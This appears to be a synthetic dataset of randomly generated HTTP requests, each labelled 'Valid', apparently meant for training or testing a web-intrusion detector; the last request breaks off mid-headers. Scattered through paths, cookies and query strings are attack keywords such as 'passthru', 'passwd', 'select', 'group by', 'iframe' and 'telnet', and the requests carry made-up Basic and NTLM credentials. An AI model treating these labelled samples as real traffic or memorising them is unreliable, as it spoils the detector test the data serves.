Warning: 339 www.8cxlJeOf.htm "y9hruhNaeio8rni" 
X-Forwarded-For: 57.171.74.241
X-Serial-Number: 12701556330524195
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22693
Start - Id: 20876
class: Valid
GET /ofmoeseeVoj6eyhla/nsuawhrHmtLPhim/tiit0WeWnoib/wfjwlxsuttusryiibtea/ethbm6olmBDen/9H/RgpositionZGgh/Keoprean/s5dAqrsi6wf2elxwtd/ebPp.js? HTTP/1.1
Host: 148.115.137.202
Connection: close
Accept: video/*;q=0.9
Accept-Charset: isiri-3342, iso-8859-8-i
Accept-Encoding: compress;q=0.8, compress;q=0.9
Accept-Language: feaoa-tss
Cache-Control: no-store
Client-ip: 188.162.242.211
Cookie: 9TbNuaxrtn3ss=517;50mowueu=6 es noBt:huetiae9;JHy90=]bineftaSUs% ltVp;alt=172;N7sepWyheeu1z=4;oahM66a=i
Cookie2: $Version="09"
Date: Sat, 01 May 04 08:18:01 CET
ETag: W/"6Zfr8mlm3ZhdZvUY1"
Expect: ef4mTus
From: 3llAde@ardeO.st
If-Modified-Since: Sat, 25 Oct 08 07:47:28 UTC
If-Unmodified-Since: Thu, 03 Nov 05 22:04:09 CET
If-Match: "O6f_5pdts8uxED0Af9P"
If-None-Match: "fuvuxn2r0qShyRkfVW_"
If-Range: Thu, 14 Oct 04 05:14:31 UTC
Max-Forwards: 1681
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Digest nc=DeFA0D0a
Authorization: Digest uri=/emin8Ai/TemtnHs.txt
Range: -77,606877-66602,300395-
Referer: http://www.n63rt.com/mlrroz.bin
TE: chunked;q=0.8,gzip;q=0.8
Trailer: If-Modified-Since
User-Agent: oeNstntcNm3tae
UA-CPU: 68000
UA-Disp: 743,400,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0585x0395
Via: HTTP/3.8 www.8aot.gif, 2.9 www.tsihnais.css:75, seh/4.8 216.119.107.89
Transfer-Encoding: gzip
Upgrade: l2sonl/9.3, rwue/0.0
Warning: 436 135.104.177.87:1264 "dhiTIi5ayllgdbbitob" 
X-Forwarded-For: 183.209.65.220
X-Serial-Number: 390733
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20876
Start - Id: 7797
class: Valid
POST /O.mdK1Hqv/opCWja-Cbjb9/heDB9YCKr/ekR/8xc3aHxu8baenmtnphNo/3smS4bosntaoa5fedtfy/selectY/jWTm5VRBfSfC/81WmyNTh6@d6jH72.cgi? HTTP/1.1
Content-Length: 215
Content-Language: n
Content-Encoding: identity
Content-Location: /sicmo.jpg
Content-MD5: ZXRybDA4T1hkQTdlOWVvRQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 29 Jul 04 18:43:48 GMT
Last-Modified: Thu, 03 Jun 04 05:05:33 GMT
Host: www.Phre.it
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.3
Accept-Language: eph0yen-oLnxsS;q=0.7, y3-hcwtioe;q=0.5, ressTn-wdy
Cache-Control: c='n'
Client-ip: 248.78.197.68
Cookie: eluxendfoc4i=576056;tTcSe=>gao we]eoera
Cookie2: $Version="5"
Date: Wed, 31 Mar 04 04:26:45 GMT
ETag: "FCqHviaLbKQ5zTz0"
Expect: 100-continue
From: msDNtTe@mtt5jy.de
If-Modified-Since: Sun, 14 Feb 10 24:45:38 CET
If-Unmodified-Since: Wed, 21 Jun 06 10:03:05 UTC
If-Match: "uypJ7OOVwGLnpFbNH"
If-None-Match: *
If-Range: *
Max-Forwards: 938
MIME-Version: 8.5
Pragma: at8mmbf='ayh'
Proxy-Authorization: NTLM aDRhYXNEZXRlZXBudUluY2Flc0FtdGVxdWlpcndzdW5zM3RUU2VlZWNoY3NnYQ==
Authorization: NTLM SHR0cW1pdnNPYWNhYW5Obmg3NmVhbzVscW0wamR5aXdhampkYzRtbmRu
Range: -43411,-175805,6-
Referer: /utEfurAy/aelsic.js
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/8.5 (Windows; U; Win 9x 9.1; cn-tH; rv:7.8.8) Gecko/30812000
UA-CPU: StrongARM
UA-Disp: 179,7168,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 669x1617
Via: 4.8 89.72.48.85, HTTP/4.6 www.w5ta.js
Transfer-Encoding: gzip
Upgrade: hZ1Tjt/9.1, t5sa/5.7, ibgt1/8.3
Warning: 240 www.9cth.tiff:70 "nahs" "Fri, 31 Aug 07 19:06:50 CET"
X-Forwarded-For: 202.225.233.245
X-Serial-Number: 27066605
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

8S@xp_hv4=4jxi.-eNCyB&iaoatasrimuy=256&nti46eklivtasef=yed&UeY3u=v2p e&ytr=neraPtelvsgtemches&iE6nttlps=xu lsn&uBcushup9ztigeo=naR&greShUmtlrseeT=38133336&tgem=pg2yerobge5iolHeO&iX8tGGeW.2=t4inctdwoTxumbhT&hcr=02063

End - Id: 7797
Start - Id: 16173
class: Valid
GET /sincludeXQWbc1OnBumWO/tia8nto7oq8hsivnlsai/ueioalntea/hsteEyecatefEa.shtml? HTTP/1.0
Host: www.HOeA.fr:0662
Connection: close
Accept: */*;q=0.8
Accept-Charset: utf-8, euc-tw
Accept-Encoding: 
Accept-Language: d-aRaI4e, ikgaoit-mastutv;q=0.4
Cache-Control: max-age=9
Client-ip: 79.127.230.228
Cookie: rcp_lusrhtacceswwp-=tcS;ooct6alrA=ehhr4mbcbai8oeb5dn;yH3fD8=19960439;oha4mshaehet=06
Cookie2: $Version="7"
Date: Fri, 11 Aug 06 22:12:39 CET
ETag: "GdpkdGTcDO4ooYNc83N"
Expect: 100-continue
From: mEck5@aosi.it
If-Modified-Since: Sat, 08 Dec 07 02:52:01 GMT
If-Unmodified-Since: Tue, 26 Aug 08 15:26:52 GMT
If-Match: "FHmCGwJIncNEz1SM"
If-None-Match: *
If-Range: Mon, 17 Dec 07 02:59:06 GMT
Max-Forwards: 07
MIME-Version: 7.0
Pragma: hrth=0qf02D
Proxy-Authorization: Basic YWlybDJjOXg6bG93YQ==
Authorization: Digest realm
Range: 2181-,58-,9-1
Referer: /triib.conf
TE: chunked,deflate
Trailer: Accept-Encoding
User-Agent: Mozilla/7.9 (X11; U; Open BSD i586 9.5; ff-ra; rv:0.1.9) Gecko/45206730
UA-CPU: PowerPC
UA-Disp: 1227,627,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 846x8936
Via: 9.9 128.46.49.182
Transfer-Encoding: deflate
Upgrade: fatonx/1.7, 3c2/0.8, 5net/4.7
Warning: 454 www.8icditia.html "fbenTdedlumlppa" 
X-Forwarded-For: 137.131.109.193
X-Serial-Number: 93986505780134
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 16173
Start - Id: 20312
class: Valid
GET /orLi4g/sstxg/gYO/vdtnnognufoi0ds/4hssdgaOemlxaIztoec/qNO3group byfCXzuXmail.css? HTTP/1.1
Host: 97.83.3.86
Connection: keep-alive
Accept: audio/*;q=0.6, application/postscript;q=0.7
Accept-Charset: iso-8859-3, big5;q=0.6, x-mac-arabic
Accept-Encoding: identity, compress;q=0.2
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 235.128.217.246
Cookie: QMimBKnmc=oig ;ankrCxsat=hQPpn;emseKteagtro6=saj e6inyacobodyY1usey
Cookie2: $Version="6"
Date: Wed, 26 Nov 08 21:33:16 CET
ETag: W/"xm5LAqgpeyoj-TKblS"
Expect: 100-continue
From: ss7chat@0nncgbi.fr
If-Modified-Since: Tue, 25 Oct 05 16:07:14 GMT
If-Unmodified-Since: Sat, 23 Sep 06 23:57:04 GMT
If-Match: *
If-None-Match: "O.WIFfO3oGr2TJEk6"
If-Range: *
Max-Forwards: 5
MIME-Version: 1.2
Pragma: exe='izuont'
Proxy-Authorization: Basic ZTI4bzplZXN0
Authorization: Basic c2k3ZWV0b0E6ZXRtcg==
Range: -755,8352-
Referer: /htrrue/epicrd.bin
TE: deflate;q=0.2,deflate;q=0.4
Trailer: Upgrade
User-Agent: fLce@LO http://www.j2eSr.ch
UA-CPU: PowerPC
UA-Disp: 2037,1915,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5764x832
Via: 8.5 101.198.250.22
Transfer-Encoding: identity
Upgrade: tsen/7.5, oodl/0.1
Warning: 569 www.tlhiuw.shtml "elwtdywe4Thero" 
X-Forwarded-For: 97.185.253.211
X-Serial-Number: 11361465282
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20312
Start - Id: 3311
class: Valid
GET /@vnullqhttps/ntea2mrI/e18X6tAjcu/systemOuj/nobeu/fNqVsH/CXliblcopyK7a/srcpepIu.nHSbH/deecbratSrhtroSeamRr/erdf8eeoi4/t8k2ghrmyex7k/heYt.tiff? HTTP/1.0
Host: 40.175.152.208:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 134.201.181.61
Cookie: YhEHimetahttplaTuS=eR$;B7fsty4sidi=Piehoeo;varB0passthru.w@=snrmaili;hpn1aeoFoDhrsZh=eonytfaoiern;Cllii3aet5uefi=4U
Cookie2: $Version="250"
Date: Fri, 01 May 09 09:21:23 GMT
ETag: W/"B6CYsOrycHzh8pC52VW"
Expect: wd2e
From: gooi@er7rmrhs.st
If-Modified-Since: Thu, 12 Apr 07 21:27:26 CET
If-Unmodified-Since: Sun, 08 Nov 09 24:02:26 CET
If-Match: "09KZ@JjL7lXUKYBs"
If-None-Match: "W8XKOlEh08IICN7a3"
If-Range: "TCKtE8zFtJ5mq0G"
Max-Forwards: 0339
MIME-Version: 4.9
Pragma: xenh='cee'
Proxy-Authorization: NTLM Y3R0ZGRTcmxiZW1iYWRhb0p0dHpuSHRvMDh2YXRmUXRVbw==
Authorization: Basic aG10YTplZ281Z2NhZQ==
Range: 715429-,64862-,731-870612
Referer: /cioi/e0ga2uat/q03csa/9JNaurns/inite.css
TE: trailers,trailers
Trailer: Host
User-Agent: taiaers81 (7qWTt72SS; oLwe_sY; tlD@6MYIC)
UA-CPU: MIPS
UA-Disp: 517,125,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 179x3842
Via: 3.5 www.lie5n.css, HTTP/7.1 www.Tmldxws.css
Transfer-Encoding: thd2he
Upgrade: utuo/8.7, ets8gR/2.1, oitnht/7.1
Warning: 659 214.21.203.106 "Esha" 
X-Forwarded-For: 72.237.241.25
X-Serial-Number: 3810417950
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3311
Start - Id: 32201
class: Valid
GET /lDCSBMrcpzaoH/9feeoe6onemehurign/ciivdm/nptieeNzr/4f9si/oE/dJNhzI@/we/ahBt.FcAoVtKPGqHluJ.jpeg?Teee6eafdep=tnrzat+ti7jha2&echo4hCUTL9=793382&62onzytrE=tli0AwpOymS&istotsoBofuendw=%28&having4u3hwinnt-lG=184236&aomnatwusanonf=55208&t2naaTldwdenYoy=94880&y7zmo=ieSS&e0=p%25nullu9bInvjf&ecoAotf=28251153&tanlma6=4800&eazitiiNTroe=r+nea+zJrA&diisE18o=slt+&hcriEgn9Agt=ket6e2Eyettb&est=raAscnfOnt1beRn HTTP/1.1
Host: www.ftdpsce.fr
Connection: keep-alive
Accept: */*
Accept-Charset: utf-8;q=0.5, x-mac-chinesesimp, x-mac-roman, x-mac-ce;q=0.9, gb2312
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: max-stale=8415
Client-ip: 160.189.180.70
Cookie: RZ0S=o;rrera9=64214;e0nitzeWenph=rain;abst7=tia rrcpsm;pes=scXeW.ON
Cookie2: $Version="60"
Date: Tue, 30 Aug 05 13:52:24 GMT
ETag: W/"Z53FXQ2@K4SojAlU"
Expect: Rarwce=ztdSeore;sbpvwtEE=0xmcltO
From: zxtk@taedSwvsh.gov
If-Modified-Since: Thu, 11 Dec 08 16:34:24 GMT
If-Unmodified-Since: Tue, 18 Oct 05 08:05:55 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 02 Jul 08 07:31:46 GMT
Max-Forwards: 121
MIME-Version: 7.1
Pragma: etdERomd='j'
Proxy-Authorization: werm rnqahTl=Rnzd2
Authorization: Basic NWVzZWg6cXlEdDhhQWg=
Range: -31011,02795-
Referer: /qaao/NEcensi/asore/mshkdia.pl
TE: trailers,trailers
Trailer: Via
User-Agent: an_M0bv.b http://www.bx1aeed.cz
UA-CPU: 68000
UA-Disp: 666,662,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 9868x2835
Via: FTP/4.9 246.60.152.57
Transfer-Encoding: compress
Upgrade: wahas/0.3, g2i27/7.9, nondad/8.9, en7/2.8, tgms/5.0
Warning: 465 144.103.243.13 "dfhVber4aysot1d" 
X-Forwarded-For: 54.1.46.142
X-Serial-Number: 76488
----: -------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 32201
Start - Id: 3758
class: Valid
GET /n8iquPjUJEQQ9/Hx/zI.EKVOldSxx75r/364mtR.bin?beDaxTg8lGrmt=5irmadecad&h7sayytLrr1o=n4resnqaegcelnei&qwmm4iithDs=+%27on+&maEtiEanTa=wiruxdpqriU&3yyeai=97654681 HTTP/1.1
Host: www.mSdmbaaeo.de
Connection: close
Accept: text/*
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: be-d
Cache-Control: min-fresh=2522
Client-ip: 155.101.185.237
Cookie: kOmi6rlREca=i1seooE9ylee;cuaUdllnpadag=8
Cookie2: $Version="742"
Date: Fri, 27 Oct 06 11:55:42 CET
ETag: W/"G8STgf-fSVE.G9zO"
Expect: Hnltifte=gEgrN;rweba=dmmta
From: t3r8@0e5kkbee.de
If-Modified-Since: Fri, 03 Oct 08 10:25:21 GMT
If-Unmodified-Since: Fri, 01 Sep 06 02:13:32 CET
If-Match: "CY108Yq8ZxGjSK6oVp"
If-None-Match: *
If-Range: Fri, 27 Apr 07 05:54:53 UTC
Max-Forwards: 04
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: d7tg8 ePiym=ryti
Authorization: i3rhtg aoknT=cenOm
Range: 106-087945,9846-
Referer: /iorakir4/eyip/lVwho/qaEple/66aetsut.png
TE: chunked;q=0.3,trailers
Trailer: Pragma
User-Agent: Mozilla/8.0 (compatible; ilvpltcael; Open BSD i586; e8Oeoz; rutl; tmshns4h4)
UA-CPU: StrongARM
UA-Disp: 599,9039,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0475x7705
Via: HTTP/0.9 194.223.113.210, FTP/5.3 www.bHtnet.css
Transfer-Encoding: compress
Upgrade: nan/5.7, Onp/4.3
Warning: 367 12.156.245.18 "Otmdscjdta" 
X-Forwarded-For: 2.28.238.117
X-Serial-Number: 68867877
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3758
Start - Id: 13248
class: Valid
GET /rpAgMY/edlemd6furrtutz7t5mc/eS3hsz/5its3oreo6mqygee5no2/2ONQxkV@p.R8L6/snratao/dj0ziw/8QQlgM8yEJ/tnf43d/yGftpkJQoptthncjfNS6/uwwo.js?ti4erhrgseIqtet=tZ-SjMm%403T&Trs=oenta&heztsntchsn=%7C8&labnweNiE=%3CAhidu&fanhryst=7&yfmhom4yRDeier=013244&taiatN08rd=0ps&W@hftpOIFvziframeIJ=epera&ypeN=r1neihxjattseu HTTP/1.1
Host: 36.34.5.234
Connection: close
Accept: */*;q=0.8
Accept-Charset: x-mac-chinesetrad;q=0.5, iso-2022-kr;q=0.9
Accept-Encoding: gzip;q=0.4, deflate, deflate, gzip, deflate;q=0.8
Accept-Language: daUxlbf-min;q=0.2, 6ocbes-n;q=0.1
Cache-Control: max-stale=0
Client-ip: 222.47.254.86
Cookie: etxonekiirlnr=Tfx L
Cookie2: $Version="9"
Date: Sat, 03 Dec 05 03:12:47 UTC
ETag: W/"GhHNWO-_tXoxBTo-GdJ"
Expect: 100-continue
From: berlo@UooOhol.cz
If-Modified-Since: Sat, 22 Oct 05 12:33:37 CET
If-Unmodified-Since: Thu, 09 Feb 06 24:59:25 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 05 Jan 05 10:40:15 GMT
Max-Forwards: 839
MIME-Version: 2.8
Pragma: dcdn8th3='HhHxeho'
Proxy-Authorization: Ooasqs dwno=ntjiba
Authorization: NTLM OGVyRW5hYW10NG5lNGVodGh0ZXA1b3RseWxvdm5yYWdpbkFsczFjbW5naXR6ZXN0
Range: 16-5
Referer: http://sSddit.be/fwEpe.php
TE: trailers,gzip;q=0.7
Trailer: Pragma
User-Agent: Mozilla/5.7 (compatible; MSIE 0.9; Linux i386; odbesgt; gtumrCmy)
UA-CPU: MIPS
UA-Disp: 2503,069,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2344x540
Via: HTTP/3.6 115.167.156.91, HTTP/4.5 www.rifmdn.html, 0.0 65.93.133.204
Transfer-Encoding: gzip
Upgrade: cdmd/1.3, tr0h/8.6, nesh/6.4, qnH/1.5, naAil/7.8
Warning: 198 157.148.141.227 "pngahiabduinT" 
X-Forwarded-For: 137.114.108.160
X-Serial-Number: 4810868204268
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13248
Start - Id: 15026
class: Valid
GET /nnstlqg29ooeReeloOnm/eaG1R0Ukxf/erIuK1Kie/gfjzvlgW5NdxNgAJNT/sIzjJcKRhE_rDsoYQ.css?0lhsns5=rpmowrviaTg&i2egeennutsssuu=aeSd%22kijee%22nb+&oity30qa6de36t=62&em=t&nIowontcce=343609&h7jiScyFR=9GC-7r7Z4vHs&snedpi=o6hf0awdnn&8ioSsdtnTro=43028&serocnieLe=copylibew0eskf%25u&hn49=9tdit%7E&etttnoieapre=4cBaMJkxX6&aeoioul=nnpornswunaOhraeib&QXVSUWcHTOq=53653 HTTP/1.1
Host: www.tpaehqstm.org
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: wcpvaoa-ap, 4azauz3H-eytardte;q=0.4, e5tfvzar-tnwtMho, htu-mfi;q=0.1, EgNa-eawb
Cache-Control: onwncei='xmprc7ha'
Client-ip: 35.69.77.51
Cookie: Efdyddz=31;.PfX=d?;rensstlmcfja=2500
Cookie2: $Version="838"
Date: Sat, 21 Aug 04 15:02:05 GMT
ETag: W/".hzPqiXYixjS-SyfCWlj"
Expect: 100-continue
From: hnmh@kie4F.uk
If-Modified-Since: Thu, 04 May 06 18:24:08 UTC
If-Unmodified-Since: Wed, 27 Dec 06 16:33:21 UTC
If-Match: "D7_t1TrwlkOJN.9ESU@1"
If-None-Match: "AFwFzGI2.jZnymO"
If-Range: *
Max-Forwards: 97
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: sneehi ac4otb7y=fkida
Authorization: lsY1e uvEmoen=pn7esdtc
Range: 5596-
Referer: /roeafi/reie.jpg
TE: chunked;q=0.3
Trailer: If-Range
User-Agent: Pgtr0p
UA-CPU: MIPS
UA-Disp: 7976,801,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7618x6392
Via: HTTP/1.7 28.50.110.90, 7.4 www.Iotcae.shtml, FTP/6.9 www.iXtPrs.html
Transfer-Encoding: gzip
Upgrade: ieR9s/3.6, iso/3.6
Warning: 742 www.inttce.js "oAn7ShenPaoetctTnl" "Sat, 02 Dec 06 12:45:12 CET"
X-Forwarded-For: 185.54.94.71
X-Serial-Number: 958943826904140
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15026
Start - Id: 18725
class: Valid
GET /rtiiodea8dmlsb5/li7EuUp48vKrQ/1KA_n/WRdJbRpMZn/egW1lk/njzeLiTviW_axU7/t6EeWPa2WJmiOZ/0oa7n.nsf?ehdisodmat=53&lFemiqdbtv2Dbo=csst9w4ieiitdT&7hnkCso07C=toit&osthhece=oadminu0atf&sn859tt99ni=wfne&cxdotnsne4atahm=6594354&amzttdrnoEuosAn=btoo%3As9nyap+o8&nLsnscc=75beo&ase=62&ooyE=03375&nneher=tobnH-dMKdf HTTP/1.0
Host: www.khe8Arlle.de
Connection: keep-alive
Accept: text/plain, audio/basic, application/postscript;q=0.6
Accept-Charset: cp-936;q=0.5, windows-1255, windows-1254;q=0.4
Accept-Encoding: compress;q=0.0, compress;q=0.3
Accept-Language: *
Cache-Control: no-store
Client-ip: 151.170.233.194
Cookie: ifdega= elot'il5+ pnupdateexecarrwgeti
Cookie2: $Version="3"
Date: Sun, 18 Feb 07 17:12:25 CET
ETag: W/"zvnk41a5Tn4k1k8ZK"
Expect: 100-continue
From: s9urn@T3rE4ome.com
If-Modified-Since: Tue, 18 May 04 13:01:36 CET
If-Unmodified-Since: Sun, 16 Jan 05 08:40:51 CET
If-Match: "Ri7Pxq3kjvApAtr"
If-None-Match: "14jPhIGBwewGJMwvntOp"
If-Range: *
Max-Forwards: 57
MIME-Version: 0.0
Pragma: 3eSael=t08jm
Proxy-Authorization: Basic bW5udHphbTpSUmFqaQ==
Authorization: u4eer tiwaj=tTpura8
Range: -0
Referer: /iOvhac.php4
TE: deflate;q=0.7
Trailer: If-None-Match
User-Agent: Mozilla/2.7 (compatible; MSIE 6.8; Linux i586; eem7c)
UA-CPU: MIPS
UA-Disp: 646,604,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4616x9503
Via: 7.5 www.tder1h.js, 1.5 107.187.118.109, 1.3 www.momcltoF.gif
Transfer-Encoding: gzip
Upgrade: ayiai/8.8, ryiyaS/1.2
Warning: 464 209.65.87.36:429 "aor5ldpxtaehio3" 
X-Forwarded-For: 225.250.72.17
X-Serial-Number: 317895
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18725
Start - Id: 7011
class: Valid
PUT /hucilzjfrZ/uctf/HEUaFPb.htm? HTTP/1.1
Content-Length: 269
Content-Language: shengj
Content-Encoding: compress
Content-Location: /tt7gelqg/rlaooTk/its24io/msIkeLse.pdf
Content-MD5: VXN3UlM3aWVzYnprcnN3ag==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 03 Feb 06 14:32:40 UTC
Last-Modified: Mon, 10 Oct 05 23:29:22 UTC
Host: 104.169.130.241
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: identity, compress;q=0.1, gzip, identity;q=0.0
Accept-Language: *;q=0.5
Cache-Control: min-fresh=34591
Client-ip: 226.93.8.242
Cookie: sqa=956;48from-G= nhs;no=nna;udusr@e9xlAr8=msf+
Cookie2: $Version="26"
Date: Fri, 12 Aug 05 15:20:33 CET
ETag: W/"l6VmMfSQ5SJbPVdibyEc"
Expect: tmrgrl
From: 3aelr@ah0pebewsn.st
If-Modified-Since: Fri, 29 Aug 08 14:54:56 CET
If-Unmodified-Since: Sun, 06 Jan 08 22:08:58 CET
If-Match: "Fm84ev5HmLk0S7D.ta"
If-None-Match: "WZuEwCcSlJBILeNB0lh3"
If-Range: *
Max-Forwards: 859
MIME-Version: 5.3
Pragma: stLoAd='3vedty'
Proxy-Authorization: NTLM dWJubHNhV2V3dGluZWRyYmFYenFxZWdZZWNpZDMxYUZyb2Rqbg==
Authorization: Basic bjFpbjpkMTV0ZVRN
Range: 594453-,90-83016,710615-38453
Referer: http://www.6eGetite.st/H6anwhtD.pdf
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/9.4 (compatible; Konqueror/4.4; Mac OS X; av5mlIM)
UA-CPU: StrongARM
UA-Disp: 5230,785,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 443x583
Via: FTP/5.1 www.dnzhte4i.html:08, FTP/8.1 www.trcnehEc.jpg, FTP/0.4 110.143.148.3:2025
Transfer-Encoding: oEgc
Upgrade: duhc1d/2.7, efNnL/5.9, iitden/5.4
Warning: 589 www.nhhyogma.shtml "fHhMnnwmhsiuhee63ct" "Tue, 29 May 07 19:39:21 UTC"
X-Forwarded-For: 67.65.254.52
X-Serial-Number: 95729667
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

9faotmw=hs4)&u5zi42eSetAdKu=nVT_B&teihuIlrltfdiAg=01&W2tusrDFqetc-f=sns&uen3tTt=fgLZybd&lzatcemeewoase=6281&o41z9uakqfm8a=Ncy&noo0htAtrg6hEs=6994064927&mgbfCCitP=dvsaeSsieif&hoerp=n&laeacdoann3lee=heih92eo&tatt6nonprhin=988&njn=2cqhlti&gt5stkjdoFahee=$tsystemhrand2

End - Id: 7011
Start - Id: 15412
class: Valid
GET /t1847LwSk/unimgdE9mochaWX4GQPcY.jsp? HTTP/1.0
Host: 60.94.26.22
Connection: close
Accept: */*;q=0.5
Accept-Charset: cp-950, iso-8859-8-i
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: on4is=asi
Client-ip: 42.68.0.83
Cookie: Ttnd74mai=733899;sxwrjs=%telnete;mecaehi8aPhrn3g=ubc wheremr;6lallRwp-IpEk=bheg;uM6tttn=ow0K0;hstoE=56313
Cookie2: $Version="36"
Date: Tue, 24 Jan 06 01:05:33 UTC
ETag: "LW9tjwmUMPYn2Ai9"
Expect: 100-continue
From: hreEo@mhtthLrava.org
If-Modified-Since: Sun, 04 Nov 07 03:25:54 UTC
If-Unmodified-Since: Wed, 06 Oct 04 24:55:24 GMT
If-Match: *
If-None-Match: "AoALLhdjAt@_5OJ7l"
If-Range: "WA@nZ@MVBp7NvASok"
Max-Forwards: 608
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Basic aHVvSTpoYXVw
Range: 9-62,54186-,361-
Referer: http://unus.cz/iior/hbgea/isaa8n/sarnirr/sfnlpfg.tar.gz
TE: deflate,trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/8.3 (Windows; U; Win 9x 7.2; ds-3y; rv:3.1.5) Gecko/60088688
UA-CPU: 68000
UA-Disp: 842,1582,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 743x937
Via: 0.3 www.h9Itpo.shtml, FTP/6.1 124.73.49.41, 2.2 www.q0en.html
Transfer-Encoding: compress
Upgrade: dAn/4.5, 3mn4ds/7.1, gos/5.5, zcote/1.9, sxOwze/3.3
Warning: 528 94.196.179.174 "sar0lanksmi" "Wed, 26 Aug 09 16:04:21 CET"
X-Forwarded-For: 197.234.139.35
X-Serial-Number: 62076260376373
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15412
Start - Id: 30549
class: Valid
GET /mTdCwc1Z-fRrE.jpg? HTTP/1.0
Host: 181.103.136.117
Connection: keep-alive
Accept: */*
Accept-Charset: iso-10646-ucs-2, iso-8859-8-i;q=0.8, iso-8859-2;q=0.0
Accept-Encoding: deflate
Accept-Language: enk-ac;q=0.9, methws-T, srte-aha
Cache-Control: max-age=990
Client-ip: 16.42.252.140
Cookie: rtioodrezq=selectP
Cookie2: $Version="485"
Date: Thu, 11 Jan 07 14:06:00 GMT
ETag: "@8CvfohAFcn7d-@5OH"
Expect: meez
From: fulner@n7m8d5nmt.de
If-Modified-Since: Sun, 08 Aug 04 06:42:57 CET
If-Unmodified-Since: Sat, 21 Jun 08 06:21:27 CET
If-Match: "ozEyhmDlRun36ylvApH"
If-None-Match: "oHAm8DCnkFcEkb_cihbk"
If-Range: Thu, 04 Dec 08 14:29:40 GMT
Max-Forwards: 48
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Digest response="4dDf5dd21A0133e5daCaF55eCeDfea5a"
Range: 369478-
Referer: http://rl7inebe.fr/ecOcwaid.sh
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/1.5 (X11; U; SunOS sun4u 1.8; ye-Hs; rv:0.4.1) Gecko/82926860
UA-CPU: 68000
UA-Disp: 9253,211,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5611x433
Via: HTTP/9.2 www.mC3gie.tiff, HTTP/6.6 98.191.145.158:08, 0.4 220.90.6.48
Transfer-Encoding: deflate
Upgrade: oro/8.8, a9o8/2.0, urC/3.4, 2oa/9.5, qDe/0.4
Warning: 671 140.154.212.102 "5oe5aeyToglnofojo" "Thu, 27 Mar 08 22:18:58 GMT"
X-Forwarded-For: 197.167.252.1
X-Serial-Number: 60141
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 30549
Start - Id: 27590
class: Valid
GET /eyV5n2G4/iB39Xfu-/1z5VC/gurhnKyc_/qse4Tw-passwdI6/gWeftiO69Y7Hzqu/d3yQuef9FGRUN/hxhJcZ.ySARcUTEyG.sz/ZwrcpAy.WwhererDLvwJ@/ho0H.aspx?742updateXeXj=dhearlagn&ttoieoarXethzma=oTGeO&heh8cxnotoukdpi=adexx&tAt0s2gybt9el=odmiidJHn+K7o&5ryMced=e%40_QdikgI2z HTTP/1.0
Host: www.okpy1dh.de
Connection: spVntenm
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: lente-seNus6;q=0.2, reoolu-taut, sm-r5xoi;q=0.0, 6ut42rfc-efimqas4;q=0.1, geudh3-4mwis;q=0.8
Cache-Control: min-fresh=99
Client-ip: 62.241.68.195
